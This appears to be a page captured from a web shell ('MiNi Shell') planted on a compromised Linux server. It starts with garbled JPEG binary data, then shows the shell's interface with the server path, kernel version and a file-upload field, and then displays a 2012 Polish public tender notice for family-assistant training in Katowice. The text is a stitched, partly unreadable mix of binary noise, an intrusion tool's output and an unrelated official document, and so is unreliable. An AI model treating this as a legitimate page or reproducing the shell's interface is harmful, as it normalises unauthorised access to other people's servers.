JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120117/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120117/15552-N-2012.html

<p class="kh_header"><b>Katowice: ROPS-PSO/3321/2/12 - Świadczenie usług szkoleniowych z zakresu przeprowadzenia ścieżki szkoleniowej: Kurs asystenta rodziny w ramach projektu systemowego Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego</b><br>
<b>Numer ogłoszenia: 15552 - 2012; data zamieszczenia: 17.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego , ul Modelarska 10, 40-142 Katowice, woj. śląskie, tel. 32 730 68 68, faks 32 730 68 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROPS-PSO/3321/2/12 - Świadczenie usług szkoleniowych z zakresu przeprowadzenia ścieżki szkoleniowej: Kurs asystenta rodziny w ramach projektu systemowego Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu ścieżki szkoleniowej pod nazwą Kurs asystenta rodziny dla 5 grup szkoleniowych - ilość osób nie większa niż 20 w każdej grupie. 
2.	Ścieżka szkoleniowa obejmuje 4 dwudniowe moduły szkoleniowe,  jeden moduł trzydniowy oraz jednodniowe warsztaty praktyczne w instytucji, w której realizowana jest usługa asystenta rodziny (dla każdej z grup):
a)	Ilość godzin szkoleniowych - 77 godzin dydaktycznych dla każdej z grup, tj. 11 dni szkoleniowych,
b)	Rozkład godzin - każdy z dwudniowych modułów obejmować powinien 14 godzin dydaktycznych, 
w następującym rozkładzie:
-	pierwszego dnia - 7 godzin dydaktycznych,
-	drugiego dnia - 7 godzin dydaktycznych.
Natomiast moduł trzydniowy obejmować powinien 21 godzin dydaktycznych, w następującym rozkładzie:
-	pierwszego dnia - 7 godzin dydaktycznych,
-	drugiego dnia - 7 godzin dydaktycznych,
-	trzeciego dnia - 7 godzin dydaktycznych.
Warsztaty praktyczne powinny zostać zrealizowane podczas jednego dnia roboczego, w wymiarze nie mniejszym niż 5 godzin dydaktycznych.
Ścieżka szkoleniowa obejmuje następujące moduły szkoleniowe, każdy z modułów będzie realizowany dla pięciu grup szkoleniowych.

I.	Wybrane zagadnienia prawne związane ze specyfiką pracy asystenta rodziny: Ilość godzin - 14 godzin dydaktycznych,
Zakres merytoryczny szkolenia musi obejmować między innymi następujące zagadnienia tematyczne:
1. Wybrane aspekty następujących aktów prawnych:
- ustawa o wspieraniu rodziny i pieczy zastępczej;
- ustawa o pomocy społecznej
- ustawa o przeciwdziałaniu przemocy w rodzinie;
- ustawa o postępowaniu w sprawach nieletnich;
- kodeks rodzinny i opiekuńczy;
- kodeks karny;
- kodeks cywilny;
- kodeks postępowania administracyjnego;
- kodeks pracy.
2. Zadania, rola i uprawnienia asystenta rodziny;
3. Etyka w pracy asystenta rodziny.

II.	Diagnozowanie problemów rodziny, tworzenie planów pracy z rodziną: Ilość godzin - 14 godzin dydaktycznych, 
Zakres merytoryczny szkolenia musi obejmować między innymi następujące zagadnienia tematyczne:
1. Definicja rodziny, jej funkcje oraz potrzeby, systemowe rozumienie rodziny;
2. Charakterystyka problemów rodziny;
3. Skuteczna diagnoza problemów występujących w rodzinie;
4. Tworzenie planów pracy z rodziną, analiza potrzeb rodziny;
5. Formy i metody pracy z rodziną, w której występują poszczególne problemy.

III.	Motywowanie klientów do zmiany: Ilość godzin - 14 godzin dydaktycznych,
Zakres merytoryczny szkolenia musi obejmować między innymi następujące zagadnienia tematyczne:
1.Psychologiczne aspekty motywowania;
2.Teorie motywacji i ich praktyczne wykorzystanie w pracy z klientem;
3. Narzędzia wspomagające proces motywowania do zmiany;
4. Metody i techniki budowania pozytywnych relacji z klientem;
5. Motywowanie do aktywności zawodowej i społecznej;
6. Planowanie oraz podtrzymywanie procesu zmiany sytuacji klienta;
7. Etapy zmiany, skuteczne radzenie sobie z oporem wobec zmiany;
8. Podnoszenie motywacji własnej.

IV.	Interwencja w sytuacjach kryzysowych w rodzinie: Ilość godzin - 21 godzin dydaktycznych,
Zakres merytoryczny szkolenia musi obejmować między innymi następujące zagadnienia tematyczne:
1. Podstawowe założenia psychologii kryzysu i interwencji kryzysowej;
2. Teorie kryzysu, fazy kryzysu, portret psychologiczny osoby w kryzysie;                                                                    3. Zasady kontaktu z osobą przeżywającą  kryzys;
4. Interwencja kryzysowa w przypadku przemocy w rodzinie;
5. Interwencja w kryzysie zagrożenia życia;
6. Interwencja kryzysowa w sytuacji utraty, śmierci i żałoby;
7. Zasady interwencji wobec problemów z uzależnieniami.
8. Interwencja wspierająca po zdarzeniu traumatycznym.

V.	Kształtowanie umiejętności opiekuńczo-wychowawczych rodziny: Ilość godzin - 14 godzin dydaktycznych,
Zakres merytoryczny szkolenia musi obejmować między innymi następujące zagadnienia tematyczne:
1. Wybrane zagadnienia z zakresu pedagogiki, psychologii rozwojowej oraz wychowawczej;
2. Umiejętności radzenia sobie z trudnościami wychowawczymi;
3. Doskonalenie umiejętności opiekuńczych ze szczególnym uwzględnieniem sytuacji kryzysowych 
i konfliktowych
4. Psychologiczne i społeczne aspekty rozwoju dziecka wychowywanego poza rodziną naturalną;
5. Zasady pielęgnacji niemowląt i dzieci;
6. Wspieranie więzi między dziećmi a ich rodzicami.

Warsztaty praktyczne: 
Wykonawca winien zapewnić możliwość obserwacji w praktyce pracy asystenta rodziny, poprzez wizytę 
w Instytucji, w której realizowana jest usługa asystenta rodziny. Warsztaty powinny zostać przeprowadzone po zakończeniu części szkoleniowej, tj po ostatnim, piątym module ścieżki szkoleniowej. Warsztaty praktyczne powinny zostać prowadzone przez osoby zatrudnione w charakterze asystenta rodziny oraz obejmować zakres merytoryczny związany z asystenturą rodzinną.

Miejsce szkolenia: Katowice, w miejscu zaproponowanym przez Wykonawcę. Wykonawca musi dysponować klimatyzowanymi salami (wyposażone w system klimatyzacji, nie dopuszcza się klimatyzatorów przenośnych), przystosowanymi do wielkości grup i warsztatowego charakteru zajęć, z oknem i dostępem do światła dziennego oraz z miejscem na rozłożenie poczęstunku dla uczestników szkolenia (przerwa kawowa, obiad). Muszą posiadać odpowiednie oświetlenie i właściwą temperaturę oraz być wyposażone w system nagłośnienia, notebook, rzutnik multimedialny, ekran do projekcji lub białą ścianę odpowiedniej wielkości, tablicę flipchart + odpowiednie kartki oraz pisaki, krzesła, stoły/stoliki.
Zamawiający zapewnia uczestnikom szkolenia oraz trenerom Wykonawcy poczęstunek w postaci przerwy kawowej oraz obiadu w formie drugiego dania.

Miejsce odbywania się warsztatów praktycznych:
Województwo Śląskie, w miejscu zaproponowanym przez Wykonawcę. Wykonawca musi zapewnić uczestnikom dojazd do miejsca odbywania się warsztatów, ubezpieczenie na wypadek następstwa nieszczęśliwych wypadków, poczęstunek w formie kawy, herbaty, ciastek. 

Termin realizacji: do 30 czerwca 2012 roku.

1.	Wykonawca odpowiada za:
a)	Przygotowanie i przeprowadzenie zajęć dydaktycznych zgodnie z harmonogramem w ramach wskazanego szkolenia. Osoba (osoby) prowadząca szkolenie winna być ujęta w tabeli stanowiącej załącznik do złożonej oferty (Załącznik nr 6 do SIWZ) oraz posiadać:
-	minimalne wykształcenie na poziomie wyższym magisterskim z zakresu problematyki odpowiadającej tematycznie zagadnieniom, z których prowadzone będzie szkolenie;
-	doświadczenie w prowadzeniu szkoleń w danym zakresie tematycznym - co najmniej 3-letnie doświadczenie w prowadzeniu szkoleń.
b)	Prawidłowe przeprowadzenie badania pretestowego i posttestowego, w tym za opracowanie, rozdanie 
i zebranie wypełnionych przez uczestników szkolenia testów oraz przekazanie do siedziby Zamawiającego elektronicznej wersji testów wraz z kluczem z odpowiedziami.
Formularze pretestu i posttestu winny być identyczne i zawierać 5 pytań (cztery pytania zamknięte jednokrotnego wyboru i jedno pytanie otwarte), obejmujące zakres merytoryczny danego modułu szkoleniowego.
Pretest winien być przeprowadzony przed rozpoczęciem zajęć dydaktycznych realizowanych w ramach wskazanej ścieżki szkoleniowej, natomiast posttest - przed ich zakończeniem.
c)	Opracowanie, wydruk i dostarczenie do siedziby Zamawiającego materiałów dydaktycznych oraz pretestów i postestów wraz z kluczem najpóźniej na 2 dni robocze przed terminem szkolenia.
Materiały szkoleniowe winny być przygotowane w formie skryptu i zawierać:
-	stronę tytułową;
-	harmonogram szkolenia;
-	informacje teoretyczne z zakresu prowadzonego szkolenia;
-	treści pomocnicze do prowadzonych zajęć warsztatowych;
-	miejsce do prowadzenia notatek (co najmniej 3 strony na 1 dzień ).
Na materiałach należy umieścić informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz logotypy zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Dostarczenie do siedziby zamawiającego elektronicznej wersji materiałów dydaktycznych.
d)	Opracowanie, konsultacje z Zamawiającym, wydruk, przygotowanie duplikatów lub kserokopii dla Zleceniodawcy oraz rozdysponowanie pomiędzy wszystkich uczestników szkolenia certyfikatów uczestnictwa.
Na certyfikatach należy umieścić informację, iż szkolenie realizowane było w ramach projektu pt.: Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz logotypy zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
e)	Wydruk, rozdanie i zebranie wśród uczestników szkolenia 2-stronnych ankiet ewaluacyjnych sporządzonych według wzoru przekazanego przez Zamawiającego.
2.	Zamawiający w dniach szkolenia zapewnia uczestnikom oraz trenerom lunch oraz przerwę kawową, nie zwraca kosztów dojazdu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
Spełnia oznacza, że wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert,                   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, co najmniej 3 usługi polegające na świadczeniu usług szkoleniowych z zakresu asystenta rodziny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
Spełnia oznacza, że wykonawca dysponuje osobami, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do realizacji przedmiotu zamówienia, tj. minimalne wykształcenie na poziomie wyższym magisterskim z zakresu problematyki odpowiadającej tematycznie zagadnieniom, z których prowadzone będzie szkolenie. Osoby muszą posiadać doświadczenie                    w prowadzeniu szkoleń - co najmniej 3-letnie doświadczenie w prowadzeniu szkoleń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie zgodne w treści z Załącznikiem nr 7 do SIWZ, że osoby, które będą uczestniczyć w wykonaniu zamówienia spełniają wszystkie wymagania Zamawiającego przedstawione w opisie przedmiotu zamówienia do Specyfikacji Istotnych Warunków Zamówienia</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Podpisany i wypełniony Formularz ofertowy, załącznik nr 1 do SIWZ,
b)	Podpisany i wypełniony Program zajęć, załącznik nr 8 do SIWZ ,
c)	Wszystkie wymagane przez Zamawiającego oświadczenia i dokumenty wskazane w rozdziale VI niniejszej SIWZ,
d)	Pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie firmy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą nastąpić w następujących przypadkach: 
a)	Zaistnienia omyłki pisarskiej,
b)	Zmiany danych teleadresowych,
c)	Zaistnienia siły wyższej (np. powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy                     w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
d)	Dopuszcza się możliwość zmiany terminu szkolenia składającego się na przedmiot umowy                          z następujących przyczyn:
- jeżeli w wyniku przeprowadzonej rekrutacji do udziału w szkoleniu nie zostanie zakwalifikowana przynajmniej 60%  grupa uczestników spełniających kryteria stawiane na etapie procesu rekrutacji,
- jeżeli ze względu na wypadek losowy nie będzie możliwe przeprowadzenie szkolenia (w szczególności: choroba trenera, siła wyższa).
W szczególnie uzasadnionych wypadkach, dopuszczalna jest zmiana osoby (osób) prowadzącej szkolenie, po uprzednim poinformowaniu o tym fakcie Zamawiającego, z podaniem przyczyny tejże zmiany i uzyskaniem akceptacji przez Zamawiającego.
Zamawiający może zwrócić się do Wykonawcy o zmianę osoby (osób) prowadzącej szkolenie jeśli                     w wyniku przeprowadzonej przez Zamawiającego ankiety ewaluacyjnej uzyska ona ocenę poniżej 3,75                               pkt. w pięciostopniowej skali ocen.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops-katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego, 
ul. Modelarska 10, 
40-142 Katowice
pokój nr 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2012 godzina 10:00, miejsce: Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego, 
ul. Modelarska 10, 
40-142 Katowice
kancelaria, pokój nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, w ramach projektu systemowego pod nazwą: Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com